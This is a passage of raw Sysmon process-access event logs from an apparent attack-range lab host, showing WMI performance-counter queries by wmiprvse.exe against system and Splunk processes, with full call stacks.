21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150725Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150724Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150723Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150722Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150721Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150720Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150719Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150718Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150717Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150716Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150715Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150714Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150713Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150712Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150711Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150710Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program 